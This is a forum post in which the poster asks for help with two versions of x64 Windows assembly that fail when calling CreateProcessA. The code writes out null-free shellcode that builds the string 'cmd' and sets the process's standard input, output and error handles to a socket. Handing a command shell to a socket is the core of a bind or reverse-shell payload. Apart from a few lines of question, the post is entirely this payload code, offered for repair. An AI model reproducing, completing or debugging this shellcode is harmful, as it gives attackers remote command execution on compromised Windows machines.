Hi.
I need help with CreateProcessA, it doesn't work and I don't know why...
I did this code first, but it doesn't work, someone explained me that maybe the parameters are corrupting ProcessInfo.
mov r13, rdx ;CreateProcessA
xor rdx, rdx
xor r15, r15
mov edx, 0x646d6361
shr edx, 8
push rdx
mov r15, rsp ;cmd
xor rdx, rdx
push rdi ;socket
push rdi ;socket
push rdi ;socket
push rdx
push rdx
xor rax, rax
inc rax
rol rax, 8
push rax ;0x00000100
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
xor rax, rax
add al, 44
push rax
xor r14, r14
mov r14, rsp ;STARTUPINFOA
xor r12, r12
sub rsp, 0x16
mov r12, rsp ;ProcessInfo
sub rsp, 0x58 ;shadowspace
mov [rsp+72], r12 ;ProcessInfo
mov [rsp+64], r14 ;STARTUPINFOA
mov [rsp+56], rdx
mov [rsp+48], rdx
mov [rsp+40], rdx
xor rax, rax
inc rax
mov [rsp+32], rax
xor r8, r8
xor r9, r9
mov rdx, r15 ;cmd
xor rcx, rcx
call r13
well, so I change the code and I did this.
mov r13, rdx ;CreateProcessA
xor rdx, rdx
xor r15, r15
mov edx, 0x646d6361
shr edx, 8
push rdx
mov r15, rsp ;cmd
xor r12, r12
xor rcx, rcx
xor rdx, rdx
mov rcx, 0x80
lop_nul:
push rdx
loop lop_nul ;space for STARTUPINFOA and ProcessInfo
xor rax, rax
mov al, 0x68
lea r12, [rsp]
mov [r12], dword eax
mov [r12+4], rcx
mov [r12+12], rcx
mov [r12+20], rcx
mov [r12+24], rcx
xor rdx, rdx
mov dl, 255
inc rdx
mov [r12+0x3c], edx ;0x00000100
mov [r12+0x50], rdi ;socket
mov [r12+0x58], rdi ;socket
mov [r12+0x60], rdi ;socket
xor rdx, rdx
sub rsp, 0x58
lea r9, [r12]
mov [rsp+64], r9
lea r9, [r12+104]
mov [rsp+72], r9
mov [rsp+56], rdx
mov [rsp+48], rdx
mov [rsp+40], rdx
xor rax, rax
inc rax
mov [rsp+32], rax
xor r8, r8
xor r9, r9
mov rdx, r15 ;cmd
xor rcx, rcx
call r13
With a source code on C++ using CreateProcess and debugging the code I don't see the real problem.
So, can somebody help me with this please?.
